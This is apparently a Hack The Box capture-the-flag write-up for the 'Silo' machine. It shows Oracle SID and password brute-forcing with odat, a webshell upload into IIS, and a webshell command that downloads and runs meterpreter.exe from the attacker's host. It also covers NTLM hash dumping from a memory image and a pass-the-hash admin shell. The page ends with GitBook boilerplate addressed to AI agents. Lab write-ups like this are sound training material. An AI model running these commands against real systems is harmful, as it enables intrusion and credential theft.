> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-silo.md).

# HTB - Silo

## Enumeration and Foothold

```bash
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
```

There is a Oracle TNS listener running on the machine.

No smb guest or anonymous access and a webserver running on the machine.&#x20;

This means if we can get a valid creds on the oracle db we may be upload a webshell on the webserver.

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2em3Z5ENgOmTI7s4PSge%2Fimage.png?alt=media&amp;token=72a7fe2d-6f76-4ac3-8d79-fee43eaa58c1" alt=""><figcaption></figcaption></figure>

No interesting directories or vhosts found.

### Oracle - TNS

Oracle requires a specific set of tools for enumeration. The main goal is to find a valid **SID (Service Identifier)**, which is essentially the database name

**`odat` (Oracle Database Attacking Tool)**: This is the most comprehensive tool for Oracle enumeration and exploitation. or i can use

**`tnscmd10g`**: A simpler command-line tool to interact with the listener, useful for basic information gathering

I can use nmap scripts to guess the sid.

```bash
─(ajay㉿kali)-[~/Downloads]
└─$ nmap -p 1521 --script oracle-sid-brute --script-args oracle-sid-brute.sids=default 10.129.19.68
Starting Nmap 7.98 ( <https://nmap.org> ) at 2026-06-16 21:34 -0400
Stats: 0:00:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.129.19.68
Host is up (0.044s latency).

PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-sid-brute: 
|_  XE

Nmap done: 1 IP address (1 host up) scanned in 70.48 seconds
```

Oracle SID: `XE (Oracle Express Edition)`\
Version: `Oracle 11.2.0.2.0`

```bash
──(ajay㉿kali)-[~/Downloads/odat-master-python3]
└─$ python3 odat.py sidguesser -s 10.129.19.68 -p 1521[+] Target: 10.129.19.68:1521 [sidGuesser]

[1] (10.129.19.68:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.129.19.68:1521 server
[+] 'XE' is a valid SID. Continue...                                                                                
100% |#############################################################################################| Time: 00:01:22 
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.129.19.68:1521)
100% |#############################################################################################| Time: 00:00:02 
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.129.19.68:1521)
[+] 'XE' is a valid SID. Continue...                                                                                
100% |#############################################################################################| Time: 00:01:04 
[+] SIDs found on the 10.129.19.68:1521 server: XE

```

next i can use the password guessor for idenitfying valid creds.

```bash
┌──(ajay㉿kali)-[~/Downloads/odat-master-python3]
└─$ python3 odat.py passwordguesser -s 10.129.19.68 -p 1521 -d XE
[+] Target: 10.129.19.68:1521 (SID: XE) [passwordGuesser]

[1] (10.129.19.68:1521): Searching valid accounts on the 10.129.19.68 server, port 1521
The login #internal has already been tested at least once. What do you want to do:                 | ETA:  00:02:09 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'mdsys' account is locked, so skipping this username for password                      | ETA:  00:02:17 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password                 | ETA:  00:01:47 
[!] Notice: 'outln' account is locked, so skipping this username for password                      | ETA:  00:01:36 
[+] Valid credentials found: scott/tiger. Continue...                                                               
[!] Notice: 'xdb' account is locked, so skipping this username for password####################    | ETA:  00:00:10 
100% |#############################################################################################| Time: 00:04:24 
[+] Accounts found on 10.129.19.68:1521/sid:XE: 
scott/tiger
```

valid credentials: `scott/tiger` on the Oracle XE database

```bash
──(ajay㉿kali)-[~/Downloads/odat-master-python3]
└─$ python3 odat.py all -s 10.129.19.68 -p 1521 -d XE -U scott -P tiger
[+] Target: 10.129.19.68:1521 (SID: XE) as scott/tiger [all]
[+] Checking if target 10.129.19.68:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.19.68:1521 is well configured. Continue...

[1] (10.129.19.68:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

[2] (10.129.19.68:1521): Testing all authenticated modules on sid:XE with the scott/tiger account
[2.1] UTL_HTTP library ?
[-] KO
[2.2] HTTPURITYPE library ?
22:07:20 WARNING -: Impossible to fetch all the rows of the query select httpuritype('<http://0.0.0.0/>').getclob() from dual: `ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`
[-] KO
[2.3] UTL_FILE library ?
[-] KO
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[-] KO
[2.6] DBMSSCHEDULER library ?
[-] KO
[2.7] CTXSYS library ?
[-] KO
[2.8] Hashed Oracle passwords ?
[-] KO
[2.9] Hashed Oracle passwords with a view in ORACLE_OCM?
22:07:21 WARNING -: Hashes can not be got with Oracle_OCM. This method is only valid when database is 12c or higher
[-] KO
[2.10] Hashed Oracle passwords with a view in DBMS_STAT?
[-] KO
[2.11] Hashed Oracle passwords from history?
[-] KO
[2.12] Hashed Oracle passwords with DBMS_METADATA.GET_DDL ?
22:07:21 WARNING -: Impossible to get no locked Oracle accounts: `ORA-00942: table or view does not exist`. Continue with empty list of account locked
[-] KO
[2.13] DBMS_XSLPROCESSOR library ?
[-] KO
[2.14] External table to read files ?
[-] KO
[2.15] External table to execute system commands ?
[-] KO
[2.16] Oradbg ?
[-] KO
[2.17] DBMS_LOB to read files ?
[-] KO
[2.18] SMB authentication capture ?
[-] KO
[2.19] Gain elevated access (privilege escalation)?
[2.19.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[-] KO
[2.19.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[2.19.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[2.19.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[2.19.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[2.20] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[-] KO
[2.21] Create file on target (CVE-2018-3004)?
[-] KO
[2.22] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[+] Impossible to know if the database is vulnreable to the CVE-2012-3137. You need to run this as root because it needs to sniff authentications to the database

[3] (10.129.19.68:1521): Oracle users have not the password identical to the username ?
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password                    | ETA:  00:00:00 
The login XS$NULL has already been tested at least once. What do you want to do:                   | ETA:  00:00:09 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password                | ETA:  00:00:55 
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password           | ETA:  00:00:38 
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password                | ETA:  00:00:29 
[!] Notice: 'HR' account is locked, so skipping this username for password                         | ETA:  00:00:22 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password                      | ETA:  00:00:18 
[!] Notice: 'XDB' account is locked, so skipping this username for password                        | ETA:  00:00:12 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password                     | ETA:  00:00:10 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password                  | ETA:  00:00:08 
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password                     | ETA:  00:00:06 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password                 | ETA:  00:00:05 
[!] Notice: 'DIP' account is locked, so skipping this username for password####                    | ETA:  00:00:03 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password########              | ETA:  00:00:02 
100% |#############################################################################################| Time: 00:00:18 
[-] No found a valid account on 10.129.19.68:1521/sid:XE with usernameLikePassword module

```

**TNS Poisoning Vulnerability (CVE-2012-1675)** - The target is vulnerable!

But dont have privileges poking around google i saw uploading a web shell.

#### Uploading a webshell through oracle tns

```bash
──(ajay㉿kali)-[~]
└─$ odat utlfile -s 10.129.19.68 -p 1521 -d XE -U SCOTT -P tiger --sysdba --putFile "C:\\inetpub\\wwwroot" "shell.aspx" "/home/ajay/shell.aspx"

[1] (10.129.19.68:1521): Put the /home/ajay/shell.aspx local file in the C:\inetpub\wwwroot folder like shell.aspx on the 10.129.19.68 server
[+] The /home/ajay/shell.aspx file was created on the C:\inetpub\wwwroot directory on the 10.129.19.68 server like the shell.aspx file
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDEm2NJlI3c5tzTJrDKGF%2Fimage.png?alt=media&amp;token=2f07976e-0307-45c5-a1c6-3060c0bf54e5" alt=""><figcaption></figcaption></figure>

#### MSFVENOM for reverse shell

i can use msfvenom to create a executabel for reverse shell and get a reverse shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FteIsV4WjnX00odL98634%2Fimage.png?alt=media&amp;token=d0f2a0e4-099b-4008-bd25-cbc6fb2915db" alt=""><figcaption></figcaption></figure>

```bash
<http://10.129.19.68/shell.aspx?cmd=powershell> -c "Invoke-WebRequest -Uri <http://10.10.14.240:8000/meterpreter.exe> -OutFile C:\Windows\Temp\meterpreter.exe; C:\Windows\Temp\meterpreter.exe"
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzWJxPgXd8gdNEsacptrx%2Fimage.png?alt=media&amp;token=0fcf2853-2fcd-4f3d-864b-2773389925ff" alt=""><figcaption></figcaption></figure>

## Shell as IIS APPPOOL

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fwc7q3aO28MnPsbM5uKgb%2Fimage.png?alt=media&amp;token=9ca3ebd6-a143-4400-9fa7-4b770dd22770" alt=""><figcaption></figcaption></figure>

There is an `Oracle issue.txt` file.

Opening the file there is a link to access a dropbox and aslo a password to access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FS4NgKLPeuDqzIWZg4h97%2Fimage.png?alt=media&amp;token=22cdfd5e-ea3e-4cb5-ab34-61968976fe06" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FquCMLjrjFoRHbEi0f1Mf%2Fimage.png?alt=media&amp;token=9e205724-7ca4-41cc-8946-a47ba051ba31" alt=""><figcaption></figcaption></figure>

entering the password the password fails, but requesting the note in the webshell shows a different password as the first character is different.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fd5t6CvB5jiM5t9qTktOM%2Fimage.png?alt=media&amp;token=e25efe3b-c0a6-4b54-87c9-9c18e5b8f0f4" alt=""><figcaption></figcaption></figure>

and this password work.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVchzMh84n0EPQKQWn7ya%2Fimage.png?alt=media&amp;token=5ed038bc-fae0-488f-8388-65747d525dca" alt=""><figcaption></figcaption></figure>

there is a memory dump file which i can download and examine with volatality.

### Memory analysis using volatality

```bash
──(ajay㉿kali)-[~]
└─$ .venv-vol/bin/vol -f "/home/ajay/Downloads/SILO-20180105-221806.dmp" windows.info             
Volatility 3 Framework 2.28.0
Progress:  100.00               PDB scanning finished                                
Variable        Value

Kernel Base     0xf8007821b000
DTB     0x1a7000
Symbols file:///home/ajay/.venv-vol/lib/python3.13/site-packages/volatility3/symbols/windows/ntkrnlmp.pdb/A9BBA3C139724A738BE17665DB4393CA-1.json.xz
Is64Bit True
IsPAE   False
layer_name      0 WindowsIntel32e
memory_layer    1 WindowsCrashDump64Layer
base_layer      2 FileLayer
KdVersionBlock  0xf800784b1d90
Major/Minor     17432.28417
MachineType     840
KeNumberProcessors      0
SystemTime      2018-01-05 22:18:07+00:00
NtSystemRoot    C:\Windows
NtProductType   NtProductServer
NtMajorVersion  6
NtMinorVersion  3
PE MajorOperatingSystemVersion  6
PE MinorOperatingSystemVersion  3
PE Machine      34404
PE TimeDateStamp        Thu Aug 22 11:40:41 2013
```

i can dump the hashes from the hives using hashdump

```bash
┌──(ajay㉿kali)-[~/volatility_2.6_lin64_standalone]
└─$ ./volatility_2.6_lin64_standalone -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
```

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNR4oWjOaeFt8mgRwK7jl%2Fimage.png?alt=media&amp;token=a571c47d-6300-41e1-92e2-d011fa35eabe" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box/htb-silo.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
